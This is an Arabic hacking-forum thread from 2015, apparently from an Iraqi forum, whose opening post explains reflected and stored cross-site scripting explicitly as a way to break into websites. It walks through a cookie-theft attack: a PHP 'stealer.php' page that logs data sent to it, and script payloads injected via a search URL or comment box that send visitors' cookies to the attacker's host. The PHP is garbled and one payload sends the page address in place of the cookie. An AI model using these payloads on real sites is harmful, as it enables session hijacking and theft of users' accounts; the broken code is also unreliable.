1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

الموضوع في 'آمن المواقع والسيرفرات' بواسطة Mr.7nsh, بتاريخ ‏29 يناير 2015.

كاتب الموضوع : Mr.7nsh المشاهدات : 751 الردود : 12 ‏29 يناير 2015
  1. غير متصل

    Mr.7nsh
    rankrank
    Developer

    عضو منذ:
    ‏7 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    [​IMG]
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    كيفكم اخواني ان شاء الله بألف خير

    ندخل في الموضوع على طوول

    ثغرات Cross Site Scripting


    [​IMG]
    [​IMG]

    [​IMG]

    ما هي ثغرات XSS في المواقع و كيفية الإستفادة منها لاختراق المواقع :ُ{a3}:ُ؟

    ان المواقع المصابة بثغرات ال XSS هي المواقع التي تستطيع التعديل على محتوى

    مصدرها و ادخال كود javascript أو HTML او PHP

    ما يجب ان تعرفه HTML,javascript,PHP

    اي ان ثغرة XSS تعني امكانية تعديل محتويات الموقع :ُ{ze}:ُ

    و معظم هذه الثغرات موجودة في مربعات البحث في المواقع :ُ{1u}:ُ

    مثلا عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص.

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    يكون الموقع قد كتب في صفح البحث جملة "نتائج البحث ل word : ".

    و لكن ماذا اذا أدخلنا سكريبت جافا سكريبت في مربع البحث؟

    [JS]http://www.facebook.com/search.php?q=<script>alert("XSS")</script>word[/JS]

    ستكتب صفحة البحث "نتائج البحث ل <script>alert("XSS")</script>word : "

    هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة XSS

    هذا يعني ان الموقع مصاب بثغرة XSS

    لماذا يكون الموقع مصابا بها ؟

    لأن مبرمجي الموقع كسولين جدا ليفلترو كلمة البحث من الرموز المميزة مثل

    #@$%^,.<>
    ليمنعو من إدخال كود javascript او HTML

    هناك نوعين من ثغرات الXSS

    النوع الدائم :

    يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .

    حيث في مربع التعليق على موقع ما ندخل مثلا كود جافا سكريبت .

    <script>alert("XSS")</script>

    و سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة

    النوع المؤقت :
    يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم

    و لكن نستطيع إدراجه فقط عن طريق رابط البحث مثل المثال السابق

    http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word

    ما الفائدة من ثغرات XSS و كيف نستطيع اختراق الموقع عن طريقها ؟

    هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات XSS

    أهمها سرقة الكوكيز

    تحتاج الى استضافة موقع تدعم PHP

    ننشئ صفحة PHP مثال stealer.php

    تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة GET

    كود PHP:
     <?php
     $data
    =$_GET["c"]
     
    $f=open("cookies.tct","w")
     
    $f.write($data)
     
    $f.close()
     
    ?>
    هذه الصفحة سوف تكتب البيانات التي تردها الى ملف cookies.txt و البيانات التي

    سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة

    مثال في الثغرات المؤقتة في طريقة البحث :

    كود PHP:
    http://www.infectedsite.com/search.php?q=<script>document.location("http://ypursite.com/stealer.php?c="+document.cookie);</script>
    هنا دمجنا السكريبت

    [JS]
    <script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>[/JS]

    هذا الكود سيحول الضية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيمو

    الكوكيز عن طريق الأمر

    document.cookie

    هنا اذا فتحنا الملف

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    ستجد الككيز للمستخدم مكتوبة فيها

    اما في الثغرات الدائمة فيكفي ادخال الكود

    [JS]<script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>[/JS]

    ليسرق الكوكيز

    و أيضا في الثغرات الدائمة نستطيع ان نحول متصفح الموقع المصاب بالثغرة XSS

    عن طريق سكريبت
    :ُae@:
     


    جاري تحميل الصفحة...
  2. غير متصل

    al_98r
    Developer

    عضو منذ:
    ‏21 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    يعطيك الف عافيه على الشرح
    ما قصرت
    ابدعت
    100%
    :ُ{10}:ُ
     


  3. غير متصل

    مجنــ قلبي ـون
    rankrank
    Developer

    عضو منذ:
    ‏18 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    يعطيك العافية على جهدك المميز
    مشكوووور ربي يوفقك ويجزاك الخير
     


  4. غير متصل

    MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الوظيفة:
    I.T Student
    الإقامة:

    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    عاشت ايدك
    شرح جميل جداً و منسق
    بارك الله بك
    {1!$8}
     


  5. غير متصل

    !»°بہًكہًر الہًعہًراقہًي°«! أداري أقسام حماية الأجهزة

    عضو منذ:
    ‏7 فبراير 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,478
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:

    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    ابداع تقبل مروري
     


  6. غير متصل

    yacine-dz
    rank
    Developer

    عضو منذ:
    ‏18 مايو 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    والله اخي شرح روعة بس ما فهمت كتير ممكن شرح تطبيقي
     


  7. غير متصل

    مصطفى الموسوي
    V • I • P

    عضو منذ:
    ‏5 ديسمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    789
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:

    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    وعليك السلام ورحمة الله وبركاتة
    بالصراحة موضوع جيد وتنسيق رائع
    استمر في جديدك
    تحياتي
    {1!$7}​
     


  8. غير متصل

    Hacker-X
    Developer

    عضو منذ:
    ‏9 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    مبدع أخي بارك الله فيك
     


  9. غير متصل

    OuT-L4w <b><font size="4"><font color="#FF0000">Ṩ</font><f
    rankrank
    Developer

    عضو منذ:
    ‏10 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    الله يعافيك اخي .^
     


  10. غير متصل

    تــــركــــي
    DeveloPer Plus

    عضو منذ:
    ‏25 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    بارك الله فيك ي بطل :{1}:​
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...